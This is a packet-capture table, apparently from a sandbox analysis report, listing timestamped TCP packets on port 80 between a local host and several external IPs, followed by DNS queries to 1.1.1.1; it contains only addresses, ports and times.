                                                                                                Nov 11, 2024 17:05:02.445033073 CET80498093.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:02.445522070 CET80498093.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:02.445678949 CET4980980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:03.818587065 CET4980980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:03.953104973 CET80498093.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:04.836265087 CET4981080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:04.972963095 CET80498103.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:04.973182917 CET4981080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:04.980735064 CET4981080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:05.115428925 CET80498103.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:05.117436886 CET80498103.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:05.117667913 CET4981080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:06.489871025 CET4981080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:06.624998093 CET80498103.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.507282019 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.642697096 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.642992020 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.650649071 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.650707960 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.785139084 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785228968 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785237074 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785243988 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785856962 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.178596020 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.314055920 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.314229965 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.319263935 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.453752995 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.454735994 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.454849005 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.455044031 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.456861973 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.593866110 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.474417925 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:15.721847057 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.722064972 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:15.729585886 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:15.976943016 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.977914095 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.978056908 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.978497028 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:17.237458944 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.254959106 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.502234936 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.502562046 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.510823011 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.758194923 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.758709908 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.758718014 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.758886099 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:20.018134117 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.037396908 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.284837008 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.285161972 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.301706076 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.301724911 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.301800013 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.549206018 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549213886 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549324036 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549330950 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549335957 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549340010 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549345016 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549880028 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549981117 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.550136089 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:22.814404011 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:23.831818104 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.078856945 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.079042912 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.084741116 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.331734896 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332834005 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332942009 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332952023 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332959890 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332984924 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332990885 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.333100080 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.333209991 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.335050106 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.582173109 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.346343040 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.463574886 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.463795900 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.471441031 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.588624001 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606569052 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606605053 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606623888 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606739998 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.612642050 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.612848997 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:30.984494925 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.001952887 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.119400978 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.119637012 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.127116919 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.244615078 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262219906 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262269974 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262303114 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262543917 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.262644053 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.268872023 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.269006014 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:33.640173912 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.657573938 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.792717934 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.792905092 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.800620079 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.800676107 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.935236931 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935308933 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935338020 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935365915 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935899973 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935949087 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.936016083 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.936233044 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.936347008 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:36.311486006 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.328867912 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.463659048 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.463915110 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.468961954 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.603640079 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.603722095 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.603729963 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.604290962 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.606120110 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.740185976 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:42.609203100 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:42.902559996 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:42.902822971 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:42.910332918 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:43.203495026 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:43.224169016 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:43.224210978 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:43.224319935 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:44.419076920 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:45.436471939 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:45.727025032 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:45.727241039 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:45.734800100 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:46.025398970 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:46.037164927 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:46.037308931 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:46.037534952 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:47.246578932 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.264134884 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.556248903 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.556432009 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.564104080 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.564162016 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.855928898 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856076956 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856173038 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856184006 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856307983 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.873466015 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.873541117 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.873740911 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:50.074129105 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.091495991 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.382091999 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.382229090 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.387305021 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.677902937 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.694986105 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.695099115 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.695303917 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.697108984 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.987821102 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:56.699819088 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:57.031641960 CET8049825154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:05:57.031928062 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:57.039556026 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:57.371431112 CET8049825154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:05:57.371517897 CET8049825154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:05:57.371692896 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:58.540954113 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:59.558420897 CET4982680192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:59.885734081 CET8049826154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:05:59.885934114 CET4982680192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:59.893410921 CET4982680192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:00.220705032 CET8049826154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:00.220974922 CET8049826154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:00.221210957 CET4982680192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:01.759246111 CET4982680192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:02.776370049 CET4982780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:03.108273983 CET8049827154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:03.108473063 CET4982780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:03.116106987 CET4982780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:03.116182089 CET4982780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:03.448179960 CET8049827154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:03.448493958 CET8049827154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:03.448595047 CET8049827154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:03.448847055 CET8049827154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:03.449050903 CET8049827154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:03.449198008 CET4982780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:04.617748022 CET4982780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:05.635370970 CET4982880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:05.951607943 CET8049828154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:05.951883078 CET4982880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:05.956892967 CET4982880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:06.273196936 CET8049828154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:06.273411989 CET8049828154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:06.273646116 CET4982880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:06.275470018 CET4982880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:06:06.591661930 CET8049828154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:06:11.290210962 CET4982980192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:11.425565958 CET804982913.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:11.425751925 CET4982980192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:11.433247089 CET4982980192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:11.566720963 CET804982913.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:11.567188025 CET804982913.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:11.567414999 CET4982980192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:12.944063902 CET4982980192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:13.084322929 CET804982913.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:13.961415052 CET4983080192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:14.098376036 CET804983013.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:14.098628044 CET4983080192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:14.106084108 CET4983080192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:14.241107941 CET804983013.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:14.241450071 CET804983013.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:14.241607904 CET4983080192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:15.615392923 CET4983080192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:15.751151085 CET804983013.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.632904053 CET4983180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:16.768198967 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.768421888 CET4983180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:16.776108027 CET4983180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:16.776196957 CET4983180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:16.910069942 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.910126925 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.910171032 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.910207033 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.910548925 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:16.910921097 CET804983113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:19.304337025 CET4983280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:19.439049006 CET804983213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:19.439269066 CET4983280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:19.444283009 CET4983280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:19.577511072 CET804983213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:19.588090897 CET804983213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:19.588166952 CET804983213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:19.588474989 CET4983280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:19.590281010 CET4983280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:06:19.723361015 CET804983213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:06:24.599781990 CET4983380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:24.716888905 CET80498333.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:24.717161894 CET4983380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:24.725188971 CET4983380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:24.842257023 CET80498333.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:24.860285044 CET80498333.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:24.860551119 CET4983380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:26.238048077 CET4983380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:26.355027914 CET80498333.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:27.255384922 CET4983480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:27.391647100 CET80498343.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:27.391794920 CET4983480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:27.399358034 CET4983480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:27.534729004 CET80498343.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:27.535424948 CET80498343.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:27.535690069 CET4983480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:28.909327030 CET4983480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:29.044624090 CET80498343.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:29.926659107 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:30.043862104 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.044034004 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:30.052366972 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:30.052416086 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:30.052464962 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:30.170689106 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.170696020 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.170700073 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.170705080 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.170708895 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.170713902 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.170717955 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.188682079 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:30.188808918 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:31.564984083 CET4983580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:31.682225943 CET80498353.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:32.582437992 CET4983680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:32.718985081 CET80498363.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:32.719265938 CET4983680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:32.724288940 CET4983680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:32.858956099 CET80498363.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:32.860625982 CET80498363.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:32.860729933 CET80498363.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:06:32.861006975 CET4983680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:32.862813950 CET4983680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:06:32.997598886 CET80498363.33.130.190192.168.11.20

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 11, 2024 17:00:59.585478067 CET6280653192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:01:00.512243032 CET53628061.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:01:16.089739084 CET6229853192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:01:16.260971069 CET53622981.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:01:29.555502892 CET5903253192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:01:29.735591888 CET53590321.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:01:42.989825964 CET5779853192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:01:43.499320030 CET53577981.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.361638069 CET5755853192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:01:57.543704033 CET53575581.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:02:10.780580044 CET6250553192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:02:10.950571060 CET53625051.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:02:25.059215069 CET5539053192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:02:25.267754078 CET53553901.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:02:39.555530071 CET6330553192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:02:39.806485891 CET53633051.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:02:53.115077972 CET6363853192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:02:53.286621094 CET53636381.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:03:06.565753937 CET6303453192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:03:06.777019024 CET53630341.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:03:20.062290907 CET5892153192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:03:20.244434118 CET53589211.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:03:33.528609037 CET5585953192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:03:33.789407015 CET53558591.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:03:47.603147030 CET5523553192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:03:47.808588028 CET53552351.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:04:02.928133965 CET6066553192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:04:03.105787039 CET53606651.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:04:16.393735886 CET6146953192.168.11.201.1.1.1
                                                                                                Nov 11, 2024 17:04:16.555360079 CET53614691.1.1.1192.168.11.20
                                                                                                Nov 11, 2024 17:04:30.031372070 CET6393353192.168.11.201.1.1.1
